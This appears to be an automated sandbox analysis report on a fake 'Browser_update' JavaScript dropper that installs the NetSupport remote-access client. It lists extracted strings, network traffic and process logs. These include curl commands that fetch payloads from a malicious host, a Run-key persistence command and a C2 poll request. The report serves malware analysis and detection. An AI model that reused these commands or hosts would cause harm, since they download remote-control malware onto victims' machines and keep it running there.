                                Source: 7zz.exe, 0000000F.00000003.494480139.00000000022A3000.00000004.00000020.00020000.00000000.sdmp, client32.exe.15.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                                Source: 7zz.exe, 0000000F.00000003.494480139.00000000022A3000.00000004.00000020.00020000.00000000.sdmp, client32.exe.15.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                                Source: 7zz.exe, 0000000F.00000003.494480139.00000000023CE000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.995634000.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, client32.exe, 00000014.00000002.513725155.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, client32.exe, 00000015.00000002.530744796.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, PCICL32.DLL.15.drString found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp
                                Source: 7zz.exe, 0000000F.00000003.494480139.00000000023CE000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.995634000.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, client32.exe, 00000014.00000002.513725155.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, client32.exe, 00000015.00000002.530744796.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, PCICL32.DLL.15.drString found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp11(L
                                Source: 7zz.exe, 0000000F.00000003.494480139.00000000022A3000.00000004.00000020.00020000.00000000.sdmp, client32.exe.15.drString found in binary or memory: http://www.netsupportsoftware.com
                                Source: 7zz.exe, 0000000F.00000003.494480139.00000000023CE000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.995634000.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, client32.exe, 00000014.00000002.513725155.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, client32.exe, 00000015.00000002.530744796.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, PCICL32.DLL.15.drString found in binary or memory: http://www.pci.co.uk/support
                                Source: 7zz.exe, 0000000F.00000003.494480139.00000000023CE000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000012.00000002.995634000.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, client32.exe, 00000014.00000002.513725155.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, client32.exe, 00000015.00000002.530744796.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, PCICL32.DLL.15.drString found in binary or memory: http://www.pci.co.uk/supportsupport
                                Source: 7zz.exe, 0000000F.00000003.494480139.0000000002773000.00000004.00000020.00020000.00000000.sdmp, 7zz.exe, 0000000F.00000003.494480139.00000000022A3000.00000004.00000020.00020000.00000000.sdmp, 7zz.exe, 0000000F.00000003.494480139.00000000023CE000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.15.dr, TCCTL32.DLL.15.dr, remcmdstub.exe.15.dr, pcicapi.dll.15.drString found in binary or memory: http://www.symauth.com/cps0(
                                Source: 7zz.exe, 0000000F.00000003.494480139.0000000002773000.00000004.00000020.00020000.00000000.sdmp, 7zz.exe, 0000000F.00000003.494480139.00000000022A3000.00000004.00000020.00020000.00000000.sdmp, 7zz.exe, 0000000F.00000003.494480139.00000000023CE000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.15.dr, TCCTL32.DLL.15.dr, remcmdstub.exe.15.dr, pcicapi.dll.15.drString found in binary or memory: http://www.symauth.com/rpa00
                                Source: 7zz.exe, 0000000F.00000003.494480139.0000000002773000.00000004.00000020.00020000.00000000.sdmp, 7zz.exe, 0000000F.00000003.494480139.00000000022A3000.00000004.00000020.00020000.00000000.sdmp, 7zz.exe, 0000000F.00000003.494480139.00000000023CE000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.15.dr, client32.exe.15.dr, TCCTL32.DLL.15.dr, remcmdstub.exe.15.dr, pcicapi.dll.15.drString found in binary or memory: https://d.symcb.com/cps0%
                                Source: 7zz.exe, 0000000F.00000003.494480139.0000000002773000.00000004.00000020.00020000.00000000.sdmp, 7zz.exe, 0000000F.00000003.494480139.00000000022A3000.00000004.00000020.00020000.00000000.sdmp, 7zz.exe, 0000000F.00000003.494480139.00000000023CE000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.15.dr, client32.exe.15.dr, TCCTL32.DLL.15.dr, remcmdstub.exe.15.dr, pcicapi.dll.15.drString found in binary or memory: https://d.symcb.com/rpa0
                                Source: wscript.exe, 00000000.00000003.475504946.0000022C1F21D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.475822396.0000022C1F21D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://magydostravel.com/
                                Source: wscript.exe, 00000000.00000003.475681562.0000022C1F253000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.475504946.0000022C1F21D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.510355916.0000022C20F80000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.512473097.0000022C1F475000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.475822396.0000022C1F21D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.512535398.0000022C20F60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://magydostravel.com/cdn/91c818ee6e9ec29f8c1.php
                                Source: CacheURL.dat.15.drString found in binary or memory: https://magydostravel.com/cdn/zwmrqqgqnaww.php
                                Source: wscript.exe, 00000000.00000002.512657860.0000022C213D7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.510525049.0000022C213D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mangoairsoft.com/
                                Source: wscript.exe, 00000000.00000002.512657860.0000022C213ED000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.510525049.0000022C213ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mangoairsoft.com/05e2f56dd5d8c
                                Source: wscript.exe, 00000000.00000003.510355916.0000022C20F80000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.510381436.0000022C1F47C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf250
                                Source: wscript.exe, 00000000.00000003.475186121.0000022C217A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e
                                Source: wscript.exe, 00000000.00000002.512087442.0000022C1F20B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.511860667.0000022C1F1D9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.510525049.0000022C213ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/11.bat?1
                                Source: curl.exe, 00000008.00000002.490233101.000001F7F5A90000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000008.00000002.490363547.000001F7F5ACA000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000008.00000003.489446879.000001F7F5ACA000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000008.00000003.489462209.000001F7F5ACA000.00000004.00000020.00020000.00000000.sdmp, wtgfOhpYJsY.bat.0.dr, 11[1].bat.0.drString found in binary or memory: https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/22.bat
                                Source: curl.exe, 00000008.00000002.490233101.000001F7F5A90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/22.bat-o
                                Source: curl.exe, 00000006.00000002.487264023.000001F4A3DB0000.00000004.00000020.00020000.00000000.sdmp, wtgfOhpYJsY.bat.0.dr, 11[1].bat.0.drString found in binary or memory: https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/7zz.exe
                                Source: curl.exe, 00000006.00000002.487264023.000001F4A3DB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/7zz.exe-
                                Source: curl.exe, 00000006.00000003.486952939.000001F4A3DD4000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000006.00000003.486824058.000001F4A3DD4000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000006.00000002.487305923.000001F4A3DEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/7zz.exep
                                Source: curl.exe, 00000004.00000002.483301000.0000020D556C0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000002.483301000.0000020D556C7000.00000004.00000020.00020000.00000000.sdmp, sett.bat.1.dr, wtgfOhpYJsY.bat.0.dr, 11[1].bat.0.drString found in binary or memory: https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/lolo.7z
                                Source: curl.exe, 00000004.00000002.483301000.0000020D556C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/lolo.7z-
                                Source: curl.exe, 00000004.00000003.483112123.0000020D556E2000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.483045639.0000020D556DF000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000002.483335654.0000020D556FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/lolo.7zq
                                Source: wscript.exe, 00000000.00000002.513263413.0000022C21DF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6eqG
                                Source: 7zz.exe, 0000000F.00000003.495588149.00000000022A8000.00000004.00000020.00020000.00000000.sdmp, putty.exe.15.drString found in binary or memory: https://sectigo.com/CPS0
                                Source: 7zz.exe, 0000000F.00000003.495588149.00000000022A8000.00000004.00000020.00020000.00000000.sdmp, putty.exe.15.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/
                                Source: 7zz.exe, 0000000F.00000003.495588149.00000000022A8000.00000004.00000020.00020000.00000000.sdmp, putty.exe.15.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
                                Source: unknownHTTP traffic detected: POST http://94.158.247.23/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 94.158.247.23Connection: Keep-AliveCMD=POLLINFO=1ACK=1Data Raw: Data Ascii:
                                Source: unknownDNS traffic detected: queries for: magydostravel.com
                                Source: global trafficHTTP traffic detected: GET /cdn/91c818ee6e9ec29f8c1.php HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-USUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: magydostravel.com
                                Source: global trafficHTTP traffic detected: GET /05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/11.bat?169173 HTTP/1.1Accept: */*Accept-Language: en-usUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: mangoairsoft.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/lolo.7z HTTP/1.1Host: mangoairsoft.comUser-Agent: curl/7.55.1Accept: */*
                                Source: global trafficHTTP traffic detected: GET /05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/7zz.exe HTTP/1.1Host: mangoairsoft.comUser-Agent: curl/7.55.1Accept: */*
                                Source: global trafficHTTP traffic detected: GET /05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/22.bat HTTP/1.1Host: mangoairsoft.comUser-Agent: curl/7.55.1Accept: */*
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: unknownHTTPS traffic detected: 185.9.147.166:443 -> 192.168.2.6:49705 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 188.127.230.147:443 -> 192.168.2.6:49706 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 188.127.230.147:443 -> 192.168.2.6:49707 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 188.127.230.147:443 -> 192.168.2.6:49708 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 188.127.230.147:443 -> 192.168.2.6:49709 version: TLS 1.2
                                Source: 7zz.exe, 0000000F.00000002.496332564.000000000054A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                                Source: Yara matchFile source: 18.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 21.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 20.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 15.3.7zz.exe.23e5280.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 15.3.7zz.exe.23d8790.4.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 15.3.7zz.exe.23e0908.6.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 20.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 15.3.7zz.exe.23e5280.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 21.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 18.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000012.00000002.995594337.0000000011194000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000014.00000002.513657390.0000000011194000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000015.00000002.530688128.0000000011194000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000F.00000003.494480139.00000000023CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: 7zz.exe PID: 3320, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: client32.exe PID: 5584, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: client32.exe PID: 3308, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: client32.exe PID: 4956, type: MEMORYSTR
                                Source: Yara matchFile source: C:\ProgramData\PCICL32.DLL, type: DROPPED
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_00403A7015_2_00403A70
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_00417BAE15_2_00417BAE
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_004442E015_2_004442E0
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_004285AD15_2_004285AD
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_0044873015_2_00448730
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_0044CA4015_2_0044CA40
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_00454B1015_2_00454B10
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_00458B3015_2_00458B30
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_00450BD015_2_00450BD0
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_00434D2815_2_00434D28
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_00460DF815_2_00460DF8
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_0045105015_2_00451050
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_0045917015_2_00459170
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_004311FE15_2_004311FE
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_0044946015_2_00449460
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_004514F015_2_004514F0
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_004217DA15_2_004217DA
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_0044192515_2_00441925
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_0042DBB615_2_0042DBB6
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_00459E7015_2_00459E70
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_00461EF015_2_00461EF0
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_00459F8015_2_00459F80
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_0045E0C015_2_0045E0C0
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_0046A2A015_2_0046A2A0
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_0044A44015_2_0044A440
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_0046A46015_2_0046A460
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_0044E43015_2_0044E430
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_004465E015_2_004465E0
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_0044A7E015_2_0044A7E0
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_0045683015_2_00456830
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_0046A95015_2_0046A950
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_004469A015_2_004469A0
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_004729A315_2_004729A3
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_0045EA6015_2_0045EA60
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_00472B3015_2_00472B30
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_00472C0B15_2_00472C0B
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_00456CF015_2_00456CF0
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_00466E3015_2_00466E30
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_0044715015_2_00447150
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_0046722015_2_00467220
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_0046F31415_2_0046F314
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_0046742015_2_00467420
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_004075F515_2_004075F5
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_0045374015_2_00453740
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_004677D015_2_004677D0
                                Source: C:\ProgramData\7zz.exeCode function: String function: 0046B890 appears 583 times
                                Source: C:\ProgramData\7zz.exeCode function: String function: 00407A18 appears 166 times
                                Source: C:\ProgramData\7zz.exeCode function: 15_2_0040BACB: DeviceIoControl,DeviceIoControl,DeviceIoControl,DeviceIoControl,15_2_0040BACB
                                Source: Browser_update16.0.5836.jsInitial sample: Strings found which are bigger than 50
                                Source: C:\ProgramData\client32.exeSection loaded: nsmtrace.dllJump to behavior
                                Source: C:\ProgramData\client32.exeSection loaded: nslsp.dllJump to behavior
                                Source: C:\ProgramData\client32.exeSection loaded: pcihooks.dllJump to behavior
                                Source: C:\ProgramData\client32.exeSection loaded: pciinv.dllJump to behavior
                                Source: C:\ProgramData\client32.exeSection loaded: nsmtrace.dllJump to behavior
                                Source: C:\ProgramData\client32.exeSection loaded: nslsp.dllJump to behavior
                                Source: C:\ProgramData\client32.exeSection loaded: nsmtrace.dllJump to behavior
                                Source: C:\ProgramData\client32.exeSection loaded: nslsp.dllJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
                                Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Browser_update16.0.5836.js"
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C://ProgramData//wtgfOhpYJsY.bat
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c C:\ProgramData\sett.bat"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -k "https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/lolo.7z" -o "C:\ProgramData\lolo.7z"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c C:\ProgramData\7z.bat"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -k "https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/7zz.exe" -o "C:\ProgramData\7zz.exe"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c C:\ProgramData\qweq.bat"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -k "https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/22.bat" -o "C:\ProgramData\qweq.bat"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "CachedX" /t REG_SZ /d "C:\ProgramData\client32.exe" /f
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c C:\ProgramData\qweq.bat"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\xcopy.exe xcopy /h /y 7zz.exe C:\ProgramData\
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c C:\ProgramData\7zz.exe x -y C:\ProgramData\lolo.7z -oC:\ProgramData\
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe TIMEOUT /T 7
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\ProgramData\7zz.exe C:\ProgramData\7zz.exe x -y C:\ProgramData\lolo.7z -oC:\ProgramData\
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c C:\ProgramData\client32.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\ProgramData\client32.exe C:\ProgramData\client32.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "CachedX" /t REG_SZ /d "C:\ProgramData\client32.exe" /f
                                Source: unknownProcess created: C:\ProgramData\client32.exe "C:\ProgramData\client32.exe"
                                Source: unknownProcess created: C:\ProgramData\client32.exe "C:\ProgramData\client32.exe"
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C://ProgramData//wtgfOhpYJsY.batJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c C:\ProgramData\sett.bat"Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c C:\ProgramData\7z.bat"Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c C:\ProgramData\qweq.bat"Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c C:\ProgramData\qweq.bat"Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -k "https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/lolo.7z" -o "C:\ProgramData\lolo.7z" Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -k "https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/7zz.exe" -o "C:\ProgramData\7zz.exe" Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -k "https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/22.bat" -o "C:\ProgramData\qweq.bat" Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "CachedX" /t REG_SZ /d "C:\ProgramData\client32.exe" /f Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\xcopy.exe xcopy /h /y 7zz.exe C:\ProgramData\
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c C:\ProgramData\7zz.exe x -y C:\ProgramData\lolo.7z -oC:\ProgramData\
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe TIMEOUT /T 7
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c C:\ProgramData\client32.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "CachedX" /t REG_SZ /d "C:\ProgramData\client32.exe" /f
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\ProgramData\7zz.exe C:\ProgramData\7zz.exe x -y C:\ProgramData\lolo.7z -oC:\ProgramData\ Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\ProgramData\client32.exe C:\ProgramData\client32.exeJump to behavior
                                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
                                Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\11[1].batJump to behavior
                                Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\b1.vbsJump to behavior
                                Source: classification engineClassification label: mal92.troj.evad.winJS@40/37@6/4
                                Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5380:120:WilError_01
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C://ProgramData//wtgfOhpYJsY.bat
                                Source: C:\ProgramData\7zz.exeFile written: C:\ProgramData\NSM.iniJump to behavior
                                Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: C:\Windows\System32\curl.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: C:\Windows\System32\curl.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: C:\Windows\System32\curl.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: C:\Windows\System32\curl.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: C:\Windows\System32\curl.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: C:\Windows\System32\curl.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: C:\ProgramData\client32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: C:\ProgramData\client32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: C:\ProgramData\client32.exeFile opened: C:\Windows\SysWOW64\riched32.dllJump to behavior
